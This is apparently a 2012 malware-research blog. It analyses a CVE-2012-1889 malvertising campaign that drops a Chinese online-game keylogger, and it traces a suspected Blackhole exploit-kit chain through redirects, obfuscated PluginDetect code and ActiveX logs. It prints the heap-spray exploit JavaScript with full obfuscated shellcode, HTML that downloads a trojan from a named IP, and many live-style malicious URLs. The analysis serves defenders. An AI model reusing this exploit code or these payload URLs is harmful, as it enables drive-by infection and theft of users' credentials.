Sunday, September 30, 2012

Chinese Malvertisement of OnlineGame Trojan/InfoStealer by Expoiting CVE-2012-1889 (MS-XML bugs MS12-043)

Actually I wrote this first in the pastebin yesterday during "crusading" with #MalwareMustDie friends.
Is the malvertisement of Chinese Online Game from the below host from Shanghai,China:
IP: 222.73.57.117
inetnum:        222.64.0.0 - 222.73.255.255
netname:        CHINANET-SH
descr:          CHINANET shanghai province network
descr:          China Telecom
descr:          No1,jin-rong Street
descr:          Beijing 100032
country:        CN
The domain is owned by a Chinese individual:
person:         Wu Xiao Li
address:        Room 805,61 North Si Chuan Road,Shanghai,200085,PRC
country:        CN
phone:          +86-21-63630562
fax-no:         +86-21-63630566
e-mail:         ip-admin@mail.online.sh.cn
nic-hdl:        XI5-AP
mnt-by:         MAINT-CHINANET-SH
changed:        ip-admin@mail.online.sh.cn 20010510
source:         APNIC
My post in pastebin is here--->>[PASTEBIN] and here--->>[PASTEBIN]
A lot of questions came up, so I am writing in now. I am making this short.
I saw these infections urls during checking spams, first leads to the xop.html:
h00p://9be14ngfsd.pppdiy.com/jx/xop.html
h00p://9f515lzff3.pppdiy.com/xy/xop.html 
h00p://9kpgfwqdrj.pppdiy.com/hx/xop.html 
h00p://9mf9x3cl55.pppdiy.com/tl/xop.html 
h00p://9spxqc71fa.pppdiy.com/jy/xop.html 
h00p://s35fc3qiyl.pppdiy.com/wd/xop.html 
h00p://s3ebb5z4sk.pppdiy.com/wd/xop.html 
h00p://s52csz5u47.pppdiy.com/wd/xop.html 
h00p://s5c2ouavle.pppdiy.com/ny/xop.html 
h00p://s9inw8nkk9.pppdiy.com/yl/xop.html 
h00p://74jjdqugds.pppdiy.com/zt/xop.html 
h00p://75kay4lxj8.pppdiy.com/jy/xop.html 
h00p://67ldbpbmmj.pppdiy.com/jy/xop.html 
h00p://rq2e9k4ti8.pppdiy.com/xy/xop.html 
h00p://rre11swub9.pppdiy.com/yh/xop.html 
h00p://436p1bwt5s.pppdiy.com/wd/xop.html 
h00p://4a41nvbsst.pppdiy.com/tl/xop.html 
h00p://4bo1ocjpk9.pppdiy.com/wm/xop.html 
h00p://4eb2c9aupa.pppdiy.com/hx/xop.html 
h00p://4ekyz6afnh.pppdiy.com/jy/xop.html 
h00p://4gjoqgnvym.pppdiy.com/jy/xop.html 
h00p://4j4yxxyugh.pppdiy.com/wd/xop.html 
h00p://4s2aqluitq.pppdiy.com/yl/xop.html 
h00p://52jbsoqe53.pppdiy.com/ah/xop.html 
h00p://rkiit9hy1a.pppdiy.com/zt/xop.html 
h00p://rldq7secto.pppdiy.com/jy/xop.html 
h00p://roapzl6ao6.pppdiy.com/yl/xop.html 
h00p://rohws731yt.pppdiy.com/tl/xop.html 
h00p://3q4cnllxe2.pppdiy.com/yl/xop.html 
h00p://2e1t8v8z9v.pppdiy.com/zt/xop.html 
h00p://2kqi7tk2tx.pppdiy.com/wd/xop.html 
h00p://2nzysx8qfy.pppdiy.com/xy/xop.html 
h00p://2pg54c2ay2.pppdiy.com/ty/xop.html 
h00p://2tvypppa1t.pppdiy.com/jx/xop.html 
h00p://2zaco8gjga.pppdiy.com/xy/xop.html 
h00p://31fclefhp5.pppdiy.com/jy/xop.html 
h00p://37fs5qo4q5.pppdiy.com/jy/xop.html 
h00p://3p3sivfs1w.pppdiy.com/jy/xop.html 
h00p://rceta3uznz.pppdiy.com/xy/xop.html 
h00p://11a1tgjoav.pppdiy.com/wd/xop.html 
h00p://quyi6g8jz8.pppdiy.com/zt/xop.html 
h00p://r7ykgk31xl.pppdiy.com/ny/xop.html 
h00p://r89i2jzv72.pppdiy.com/ah/xop.html 
h00p://r8cvnadv11.pppdiy.com/jx/xop.html 
h00p://r8v7by8hl7.pppdiy.com/wm/xop.html 
h00p://r9mdp167ou.pppdiy.com/xy/xop.html 
h00p://ra5dfl2dhp.pppdiy.com/tl/xop.html 
h00p://q4u427a9d9.pppdiy.com/wl/xop.html 
h00p://qbfjz6vs2b.pppdiy.com/ty/xop.html 
h00p://qfckl9xclm.pppdiy.com/xy/xop.html 
h00p://qoxvbbwxxv.pppdiy.com/jy/xop.html 
h00p://qpm2jb8vds.pppdiy.com/xy/xop.html 
h00p://qrbvhfpnfi.pppdiy.com/my/xop.html 
h00p://qtxjsy4psn.pppdiy.com/wd/xop.html 
h00p://ppmcnqlq4b.pppdiy.com/hx/xop.html 
h00p://pnj1c3glru.pppdiy.com/wd/xop.html 
h00p://pnrks68rrs.pppdiy.com/wd/xop.html 
h00p://pn87z1eiaj.pppdiy.com/yl/xop.html 
h00p://pcsssued3v.pppdiy.com/tl/xop.html 
h00p://p2rb4o7xo3.pppdiy.com/ty/xop.html 
h00p://p444fcmod8.pppdiy.com/jy/xop.html 
h00p://oy3eewl8dj.pppdiy.com/wm/xop.html 
h00p://z1v1awk14w.pppdiy.com/zx/xop.html 
h00p://zlpr6v2wdp.pppdiy.com/wd/xop.html 
h00p://zrxodxxsdb.pppdiy.com/jy/xop.html 
h00p://x82ndlgusg.pppdiy.com/xy/xop.html 
h00p://xgbex2gqur.pppdiy.com/wd/xop.html 
h00p://xinfejn8sh.pppdiy.com/yh/xop.html 
h00p://ypqdgh1spm.pppdiy.com/zx/xop.html 
h00p://u3gltdtoo4.pppdiy.com/jy/xop.html 
h00p://vev8ncrkcm.pppdiy.com/jx/xop.html 
h00p://vlbujx6d19.pppdiy.com/xy/xop.html 
h00p://vouludav9m.pppdiy.com/wd/xop.html 
h00p://vqouin8qdg.pppdiy.com/wd/xop.html 
h00p://ssx2pc47nw.pppdiy.com/ty/xop.html 
h00p://sw29diefib.pppdiy.com/wd/xop.html 
h00p://t1zsxal6p5.pppdiy.com/ty/xop.html 
h00p://pq58ow6ydk.pppdiy.com/yl/xop.html 
h00p://rlcensq6ds.pppdiy.com/wd/xop.html 
h00p://s9ms36eb5q.pppdiy.com/ah/xop.html 
h00p://p8t89f1q3x.pppdiy.com/xy/xop.html 
h00p://pcsir3ijj9.pppdiy.com/zt/xop.html 
h00p://pjv68ibarl.pppdiy.com/ah/xop.html 
h00p://ow858ymp4d.pppdiy.com/xx/xop.html 
h00p://opu3mx9u8s.pppdiy.com/tl/xop.html 
h00p://o1v1ia7fzp.pppdiy.com/ah/xop.html 
h00p://nq9k8bhtgy.pppdiy.com/tl/xop.html 
h00p://mj3aqytgna.pppdiy.com/wd/xop.html 
h00p://mkjbyf6vr8.pppdiy.com/xy/xop.html 
h00p://lsjq1ic827.pppdiy.com/zt/xop.html 
h00p://ln9jwxhwp2.pppdiy.com/jy/xop.html 
h00p://kltudl7ixd.pppdiy.com/wd/xop.html 
h00p://kb8ngrsrkt.pppdiy.com/zx/xop.html 
h00p://jqqm6ksd4u.pppdiy.com/jx/xop.html 
h00p://joez462a36.pppdiy.com/xy/xop.html 
h00p://ir1mxyqbe1.pppdiy.com/jy/xop.html 
h00p://hrwvzspefk.pppdiy.com/my/xop.html 
h00p://hwwlnwoh5u.pppdiy.com/jx/xop.html 
h00p://hehqxbhtrr.pppdiy.com/xy/xop.html 
h00p://gzfuswbru9.pppdiy.com/xy/xop.html 
h00p://gur1nihj4g.pppdiy.com/wd/xop.html 
h00p://gcrbfl8iyi.pppdiy.com/jx/xop.html 
h00p://fs12vmyw85.pppdiy.com/wd/xop.html 
h00p://fs9kdc75dk.pppdiy.com/jy/xop.html 
h00p://dxonfcd1zh.pppdiy.com/zt/xop.html 
h00p://dfmta9juu5.pppdiy.com/ah/xop.html 
h00p://di6uj6rqk3.pppdiy.com/jy/xop.html 
h00p://85qcnilv1k.pppdiy.com/my/xop.html 
h00p://4oy56fcvmg.pppdiy.com/jy/xop.html 
h00p://x7zzmg5b1v.pppdiy.com/jx/xop.html 
h00p://zgxx2raoak.pppdiy.com/jx/xop.html 
h00p://wxf3mzd3zn.pppdiy.com/jx/xop.html 
h00p://wzrkh2m8xl.pppdiy.com/xx/xop.html 
h00p://uc18awkxod.pppdiy.com/my/xop.html 
h00p://v2229jswhx.pppdiy.com/wd/xop.html 
h00p://pxkxilbpos.pppdiy.com/wm/xop.html 
h00p://rakwmwhpve.pppdiy.com/xy/xop.html 
h00p://nsqjxjbfcs.pppdiy.com/ah/xop.html 
h00p://ny5iceirim.pppdiy.com/jx/xop.html 
h00p://iz5lh4r5qi.pppdiy.com/yl/xop.html 
h00p://4fp9g7s3tr.pppdiy.com/xy/xop.html 
h00p://57vcqwfb8a.pppdiy.com/jy/xop.html 
h00p://oqlpdxtgux.pppdiy.com/zt/xop.html 
h00p://ocd1bm7coa.pppdiy.com/xy/xop.html 
h00p://od5aaz7m5e.pppdiy.com/jx/xop.html 
h00p://odvn3j955e.pppdiy.com/zx/xop.html 
h00p://ogd48fw2lt.pppdiy.com/tl/xop.html 
h00p://oixgmmsng1.pppdiy.com/xy/xop.html 
h00p://ntuhp4ou1t.pppdiy.com/yl/xop.html 
h00p://oaicu6zotz.pppdiy.com/zt/xop.html 
h00p://oannucq891.pppdiy.com/jx/xop.html 
h00p://nmwlyg9jtd.pppdiy.com/xy/xop.html 
h00p://nf8ri2a2ah.pppdiy.com/zt/xop.html 
h00p://myx7rlgfgz.pppdiy.com/yl/xop.html 
h00p://mzjqths79w.pppdiy.com/yl/xop.html 
h00p://n19yfqnfgx.pppdiy.com/jy/xop.html 
h00p://n318aq72eb.pppdiy.com/jy/xop.html 
h00p://n3zxb481z3.pppdiy.com/yh/xop.html 
h00p://n8dx15kr7y.pppdiy.com/xy/xop.html 
h00p://muy6w1ufrw.pppdiy.com/jx/xop.html 
h00p://mvhnrd8c9o.pppdiy.com/jy/xop.html 
h00p://mvzn8qs8lg.pppdiy.com/wd/xop.html 
h00p://mu5dptjoda.pppdiy.com/xy/xop.html 
h00p://msogw56yis.pppdiy.com/xy/xop.html
And the others leads to index.html...
h00p://yzua8al89b.pppdiy.com/wd/index.html 
h00p://wjjxh168lj.pppdiy.com/wd/index.html 
h00p://ki9hfgy8eb.pppdiy.com/wd/index.hmlt 
h00p://9fnq4ekiqd.pppdiy.com/wd/index.html 
h00p://agz5utxh9u.pppdiy.com/wd/index.html 
h00p://nkkprh379v.pppdiy.com/wd/index.html
The index.html as per plainly written in its code, using simple unobfucated JavaScript to drop wd.exe, an online game trojan info stealer.. *)dropping code:
<SPAN class=s1><A href="h00p://222.73.57.117/exe/wd.exe">ホハオタヌャタ、ヘ篁メ2.0-イサハユキム</A></SPAN>
<SPAN class=s4><SMALL><FONT style="COLOR: #c7b389">ヘニシ・/FONT></SMALL></SPAN>
<SPAN class=s2><font class="red"><script>sd--;document.write(sy+"-"+sm+"-"+sd);</script></font>  <BR><FONT color=#b7b7b7><script>sh--;si--;ss--;document.write(sh+":"+si+":"+ss);</script></FONT></SPAN>
<SPAN class=s3><A href="h00p://222.73.57.117/exe/wd.exe">᾵リマツヤリ</A></SPAN>
<EM style="CLEAR: both; DISPLAY: block"></EM>
<P class=txt>ヒオテ・兤 վウ、カ・fヘニシトメۿ隆篁メ㬺òサコテモテìモテチヒイナヨʵ#。</P>
WD.EXE is a currently a well-known-detected trojan, so I am not going to disclose it further. You can check it out in Virus Total here; MD5: 8e75d7855a5ae13da08ec21d7df673e7 File size: 32.0 KB ( 32768 bytes ) File name: 8E75D7855A5AE13DA08EC21D7DF673E7.bin File type: Win32 EXE Tags: peexe upx Detection: 37 / 43 URL:------->[VIRUSTOTAL] If we take a look into the XOP.HTML, it has JavaScript to generate exploit.. I ONLY snips some important parts...starting from exploit initiation below:
heapLib.ie = function(maxAlloc, heapBase) {
    this.maxAlloc = (maxAlloc ? maxAlloc : 65535);
    this.heapBase = (heapBase ? heapBase : 0x150000);
    this.paddingStr = "AAAA";
    while (4 + this.paddingStr.length*2 + 2 < this.maxAlloc) {
        this.paddingStr += this.paddingStr;
    }
    this.mem = new Array();
    this.flushOleaut32();
}
...and see the next codes after that in the pastebin here--->>[HERE] I detected CVE-2012-1889 which attacks MS-XML bugs MS12-043 seeking for execution arbitrary command. In the browser log you can see as follows:
[2012-09-30 17:46:47] [HTTP] URL: h00p://9be14ngfsd.pppdiy.com/jx/xop.html (Status: 200, Referrer: None)
[2012-09-30 17:46:48] <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id="vwtI"></object>
[2012-09-30 17:46:48] ActiveXObject: F6D90F11-9C73-11D3-B32E-00C04F990BB4
[2012-09-30 17:46:48] <meta content="IE=7" http-equiv="X-UA-Compatible"/>
↑the object "clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" used is PoC CVE-2012-1889, which you can confirm in in securityfocus.com-->>[HERE] That CVE-2012-1889 was used to execute the evil shellcode as per generated here:
var heap_obj = new heapLib.ie(0x20000);
var sdgryyesc = "%uschwmd5db%uschwmc9c9%uschwm87cd%uschwm9292%uschwm8f8f%uschwm938f%uschwm8e8a%uschwm8893%uschwm938a%uschwm8c8c%uschwm928a%uschwmc5d8%uschwm92d8%uschwmc5d7%uschwmd893%uschwmd8c5%uschwmbdbd%uschwmbdbd";
var sdgryyev = (sdgryyesc.replace(/schwm/g,""));
var fdgertrepx = "%schwmuBschwmDBschwmD%uBDBschwmD%uBDBschwmD%uBDBD%uBDBschwmD%uBschwmDBD%uBDBschwmD%uBDBschwmD%uEAEA";
var fdgertrepx88 = (fdgertrepx.replace(/schwm/g,""));
var fdgertrepx99 = "%u54FF%uBEA3%uBDschwmBD%uD9E2%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%uschwmBDBC%u36BD%uD7schwm55%uE4B8%u2355%uBDBF%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD0D1%u36E9%uB1FB%u3355%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8ED1%uBD8F%uCED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7%u55E4%uBFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%uBDschwmD7%uA7D7%uD7EE%u42BD%uE1EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44%uBEB9%ufaE1%uD893%uF97A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u8EEC%u367D%uE5FB%u9F55%uBDBC%u3EBD%uBD45%u1E54%uBDBD%u2DBD%uBDD7%uBDD7%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%uBCBC%uBDBD%uFB34%uD7DD%uEDschwmBD%uEB42%u3495%uD9FB%uFB36%uD7DD%uD7BD%uD7BD%uD7BD%uD7schwmB9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%uBDA2%uBschwmDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909%u3DB1%uB5C1%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7schwmBD%uD7BD%uD7BD%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%uCB42%uEDCD%uCB42%u42DD%u8DEB%uCBschwm42%u42DD%u89EB%uCB42%u42C5%uFDEB%u4636%u7D8E%u66schwm8E%u513C%uBFBD%uBDBD%u7136%u453E%uC0E9%u34Bschwm5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED%uEDEE%uEDschwmED%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955%uBDBD%u34BD%u81FB%u1CD9%uBDschwmB9%uBDBD%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%uADschwmFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE%u3D6D%u55schwm85%u853D%uC854%u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u36E8%u3051%uB8FD%u5D42%u1Bschwm55%uBDBD%u7EBD%u1D55%uBDschwmBD%u0schwm5BD%uBCAC%u3DB9%uB17F%u55BD%uBD2E%uBDBD%u5schwm13C%uBCBD%uBDBD%u4136%u7A3E%u7AB9%u8FBA%u2CschwmC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5%u2AschwmD8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A%u259D%uADB7%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD5schwm36%u36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8schwmED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%uBDBD%u445F%u428E%u42schwmEA%uB9schwmEB%uBF56%u7EE5%u4455%u4242%uE642%uBA7B%u3405%schwmuBCE2%u7ADB%uB8FA%u5D42%uEE7E%u61schwm36%uD7EE%uD5FD%uADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC93schwm6%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%schwmuBE10%u8E78%uB266%uAD03%u6Bschwm87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u36schwm60%u3schwm6B9%u78schwmBE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA376%uschwmD919%u2E5schwm2%u59schwm8F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uBschwm0DB%uFE42%u1103%uC066%u18schwm4D%uEF27%u1A43%u8367%u0BschwmA0%u0584%u69schwmD4%u03A6%uschwmDBC2%u411D%u8A14%u25schwm10%uschwmAschwmDB7%schwmu3D45%u12schwm6B%u4627%uA8EE";
var fdgertrepx98 = (fdgertrepx99.replace(/schwm/g,""));
var fdgertrepx123 = "%u58schwmayt58%u58schwmayt58%u10schwmaytEB%u4Bschwmayt5B%uC9schwmayt33%uB9schwmayt66%u03schwmaytB8%u34schwmayt80%uBDschwmayt0B%uFAE2%u05schwmaytEB%uEBschwmaytE8%uFFschwmaytFF";
var fdgertrepx1 = (fdgertrepx123.replace(/schwmayt/g,""));
var sdfetwedvz = "HJKS0c0"+"cHJKS0c"+"0c";
var code = unescape(fdgertrepx1+fdgertrepx98+sdgryyev+fdgertrepx88);
var nops = unescape(sdfetwedvz.replace(/HJKS/g,'%u'));
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, 0x100);
var shellc0de = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellc0de.length < 0x40000) shellc0de += shellc0de;
var block = shellc0de.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var z=1; z < 0x230; z++) {heap_obj.alloc(block);
Goes to this sellcode:

Can easily to be bruteforced to burp the malicious url: Some XOR efforts will lead you to strings:

h00p://[IP]/exe/[char].exe &jx
put them together to go to
h00p://222.73.57.117/exe/jx.exe
Since many asked me how I cracked this, this is a PoC snapshot: So let's move on and grab it:
--03:01:26--  h00p://222.73.57.117/exe/jx.exe
           => `jx.exe'
Connecting to 222.73.57.117:80... connected.
h00p request sent, awaiting response... 200 OK
Length: 48,128 (47K) [application/octet-stream]
Just to see the binary and you'll see many strange stuffs:
// Malware OP traces...

000000002FE6   0000004047E6      0   MoveFileA
000000003032   000000404832      0   WriteFile
00000000303E   00000040483E      0   CreateFileA
00000000304C   00000040484C      0   WinExec
000000003074   000000404874      0   CopyFileA

// keystroke controlling...

0000000030C0   0000004048C0      0   GetKeyboardLayoutList
0000000030D8   0000004048D8      0   GetKeyboardLayoutNameA
0000000030F2   0000004048F2      0   ActivateKeyboardLayout
00000000310C   00000040490C      0   GetKeyboardLayout
000000003120   000000404920      0   LoadKeyboardLayoutA
000000003136   000000404936      0   UnloadKeyboardLayout

// IME Traces...

IMM32.dll.ImmGetDescriptionA Hint[0]
IMM32.dll.ImmInstallIMEA Hint[0]
IMM32.dll.ImmIsIME Hint[0]

// temp OPS data

00000000380C   00000040520C      0   %c:\Recycled\%d.tmp
000000003820   000000405220      0   %c:\RECYCLER\%d.tmp

// Crypter service..
00000000E05C   00000040FA5C      0   sc delete cryptsvc
00000000E070   00000040FA70      0   sc config cryptsvc start= disabled
00000000E094   00000040FA94      0   net stop cryptsvc

//registry added traces

00000000E0A8   00000040FAA8      0   %s%s%d.dll // kbdus.dll
00000000E0DC   00000040FADC      0   SOFTWARE\kingsoft\JX3\zhcn
00000000E0F8   00000040FAF8      0   JX3Client  // JX3Client.exe
00000000E104   00000040FB04      0   Software\Microsoft\Windows\ShellNoRoam\MUICache
00000000E134   00000040FB34      0   %sdllcache\%s
00000000E144   00000040FB44      0   %syu%s     // net1.exe
The behavior check shows:
//Drops
%Appdata%\JX3Client.exe
%System%\chinasougou.ime
%System%\yumidimap.dll
%System%\net1.exe 

//Registry...(as per expected)
SOFTWARE\kingsoft\JX3\zhcn Value: "JX3Client.exe"

//Runs/control services:
net1.exe
sc.exe

//crypter service:
cryptsvc
It looks like a an online game with trojan functions, dumps your keystrokes. If you like to do online games avoid using this tools. It looks like this, found it in China sites..: Currently Virus Total is making good detection ratio for this: MD5: bbfc347f66c1c361e7bd401f2f0d448e File size: 47.0 KB ( 48128 bytes ) File name: sample File type: Win32 EXE Tags: peexe upx mz cve-2012-1889 exploit Detection: 35 / 42 Analysis: 2012-09-29 19:16:46 UTC ( 8 時間, 20 分 ago ) URL:------->>[VIRISTOTAL] With malware names (NOTE that the original & unpacked binary has very different namings...sigh..)
First Check in VT: (PACKED/ORIGINAL BINARY)
-------------------------------------------
McAfee                   : Artemis!BBFC347F66C1
K7AntiVirus              : Riskware
TheHacker                : Posible_Worm32
F-Prot                   : W32/Heuristic-114!Eldorado
ESET-NOD32               : a variant of Win32/PSW.OnLineGames.QBF
TrendMicro-HouseCall     : TROJ_GEN.RCBCEHF
Kaspersky                : HEUR:Trojan.Win32.Generic
F-Secure                 : Dropped:Trojan.PWS.FakeIME.B
VIPRE                    : Trojan.Win32.Generic!BT
AntiVir                  : TR/ATRAPS.Gen
TrendMicro               : TROJ_GEN.RCBCEHF
McAfee-GW-Edition        : Artemis!BBFC347F66C1
Jiangmin                 : Trojan/Generic.algbo
Microsoft                : PWS:Win32/Lolyda.BF
Commtouch                : W32/Heuristic-114!Eldorado
AhnLab-V3                : Trojan/Win32.Xema
VBA32                    : TrojanPSW.QQTen.ng
PCTools                  : Trojan.Gen
Ikarus                   : Trojan-PWS.Win32.Lolyda
Fortinet                 : W32/Onlinegames.QBF!tr
AVG                      : unknown virus Win32/DH{HhM6SEVn}
Panda                    : Suspicious file

First Check in VT: (UNPACKED)
-------------------------------
F-Secure                 : Dropped:Trojan.PWS.FakeIME.B
DrWeb                    : BackDoor.PcClient.5930
GData                    : Dropped:Trojan.PWS.FakeIME.B
Symantec                 : Suspicious.Cloud.5
Norman                   : W32/OnLineGames.NVOE
ESET-NOD32               : a variant of Win32/PSW.OnLineGames.QBF
eScan                    : Dropped:Trojan.PWS.FakeIME.B
Fortinet                 : W32/Onlinegames.QBF!tr
Emsisoft                 : Trojan-PWS.Win32.Lolyda!IK
VBA32                    : TrojanPSW.QQTen.ng
Kaspersky                : HEUR:Trojan.Win32.Generic
Jiangmin                 : Trojan/Generic.algbo
Rising                   : Trojan.Win32.Fednu.uhc
Ikarus                   : Trojan-PWS.Win32.Lolyda
AntiVir                  : TR/Crypt.ZPACK.Gen
AVG                      : unknown virus Win32/DH{HhM6SEVn}
Panda                    : Suspicious file
ViRobot                  : Trojan.Win32.A.PSW-Frethoq.51200
Comodo                   : TrojWare.Win32.Poison.QBF

Saturday, September 22, 2012

Following a lead of "Suspected" Blackhole2 - New changes in plugin detect PDF's infection method, PDF/JavaScript codes

Firstly, special thank's for the first lead to @it4sec! This post is dedicated to all #MalwareMustDie members and supporters for being solid friends!

Assuming the current target is a BlackHole v2.0 infectors online, we picked two urls from blacklist which lead to one infection. This is a story of peeling the threat. But before we continue, one more thing, this post is based on reversing we did while racing with time, sorry if you unhappy with the lack of details, please bare with it. Hope being useful. Here we go:

We got below links, which lead to the same infection case:
h00p://85.18.21.252/cKMXzC0n/index.html
h00p://85.18.21.252/SgcjN3i/index.html
(these information we picked up from blacklist, contact me for source..)
We fetched it :
h00p://85.18.21.252/cKMXzC0n/index.html
--14:18:35--  h00p://85.18.21.252/SgcjN3i/index.html
           => `index.html'
Connecting to 192.168.7.11:8118... connected.
Proxy request sent, awaiting response... 200 OK
Length: 418 [text/html]
14:18:37 (1.51 KB/s) - `index.html' saved [418/418]
To find the below code, contains 4(four) links to js.js file...
<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="h00p://rolandpangrati.com/N65FCWa1/js.js"></script>
<script type="text/javascript" src="h00p://grupo-amaro.com/GpuVcKtR/js.js"></script>
<script type="text/javascript" src="h00p://www.laptopcolorat.com/zeScNpWp/js.js"></script>
<script type="text/javascript" src="h00p://grupocitometria.org.ar/ZfHxvN8N/js.js"></script>

</html>
Those js.js files are identical one to another (diff'ed them all), And looks like the below contents...(to save space, I pasted only two)
--14:19:48--  h00p://rolandpangrati・com/N65FCWa1/js.js
           => `js.js'
Resolving rolandpangrati・com... 89.42.216.137
Connecting to rolandpangrati.com|89.42.216.137|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73 [application/javascript]
14:19:49 (1.14 MB/s) - `js.js' saved [73/73]

$ cat js.js
document.location='h00p://69.194.192.2O3/links/anybody_miss-knowing.php';

--14:22:56--  http://www.laptopcolorat.com/zeScNpWp/js.js
           => `js.js.1'
Resolving www.laptopcolorat・com... 31.14.23.252
Connecting to www.laptopcolorat.com|31.14.23.252|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73 [application/javascript]
14:22:57 (2.04 MB/s) - `js.js.1' saved [73/73]

$ cat js.js
document.location='h00p://69.194.192.2O3/links/anybody_miss-knowing.php';
↑So this is the link of the actual landing page (anybody_miss-knowing.php) We saw the obfuscated BlackHole PluginDetect v0.7.8 code written there: ↑the upper parts was the obfuscation code following w/the decoder logic. If you deobfs it well you'll get this "neutralized" code-->>[PASTEBIN] The techniques used in the obfuscation is by hiding them behind "google" element, using tag values to store obfuscation data:
<u 
id="google" 
d0="&4442494b46%3d42142o3o%453j3l3q2c^3h44…
d1="3q144449&403h3r3i14$3e15251645_3q3g3h3…
d2="e2525+163i453q3f@443l3r3q16+4d1g3l432r…
    :
    :    
d93="23d1k1i(33423l443h(1c423d1m1i$423h434…
d94="423q^3r1d4b4d3g_3r3f453p3h$3q441i4742…>
</u>
↑Additional (2012 Sept 24th) log, IMPORTANT! Please be noted, for deobfuscation of the current sample - many automation scheme are failed to deobfs it correctly or hangs, it is because the obfuscation code is having separation the JavaScript - calls/code used, it is a simple strings trick yet works to fools some - signatures. In a similar sample we found the calls - was put in the variable like this:
<html><body><script>
g="getElementById";
ss=String.fromCharCode;
gg="getAttribute";</script>
..and also there was a string manipulation to hide eval() wordings:
{window["e"+"v"+"a"+"l"](s);}
There is a step by step manual deobfuscation here:-->>[PASTEBIN] which can be used as reference for patching many automation. While tracing the infection code of PluginDetect with browser's logic, we will explain only 3 infection routes which can be simulated accordingly. (by the time I got this hint, many objects couldn't be reached.. lack of evidence) 1. Java Exploitation 1.1. Updating/install the java old update 1.6.0/vulnerable version... (I really hope the below url or related urls at sun.com to be deleted soon!)
 <object 
 classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" 
 codebase="h00p://java.sun.com/update/1.6.0/jinstall-6u60-windows-i586.cab#Version=6,0,0,0" 
 WIDTH="200" HEIGHT="200" >
1.2. After your browser is having vulnerable java installed, it downloaded - malicious java zpplet w/zeroday PoC exploiting arbitary exec shellcode to download - other evil binary..
 <PARAM NAME="ARCHIVE" VALUE="h00p://THIS-HOST-ADDRESS/links/anybody_miss-knowing.php?teredt=373402380a&teysll=4740&limflyi=cpsn&ixvr=joucpxn">
 <param name="type" value="application/x-java-applet;version=1.6">
↑by the time we got the url the applet was not accessible anymore so we cannot describe more of it. 2. The vector of the infection using MSXML2.XMLHTTP/CVE-2010-2561: 3.1. Opening ActiveXObject + creating 3 objects of: adodb.stream, Shell.Application, and msxml2.XMLHTTP 3.2. Linked to ./anybody_miss-knowing.php?[specific parameter] to download exploit 3.3. If this exploit works (CVE-2010-2561) will drop you exe (.//..//c175065.exe) 3.4. via ActiveX command ShellExecute will be used to execute the payload (this shellcode was using the format explained in previous post-->>[URL] The logs lof the above steps...
ActiveXObject: msxml2.xmlhttp
ActiveXObject: acropdf.pdf
[HTTP] URL: x.x.x.x/links/anybody_miss-knowing.php?mkk=373402380a&jiypmeg=3f&eawqt=03370302073706343433&ytejxs=0b000300020002 (Status: 200, Referrer: http://69.194.192.203/links/anybody_miss-knowing.php)
[Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (adodb.stream)
ActiveXObject: adodb.stream
[Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (Shell.Application)
ActiveXObject: shell.application
[Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (msxml2.XMLHTTP)
ActiveXObject: msxml2.xmlhttp
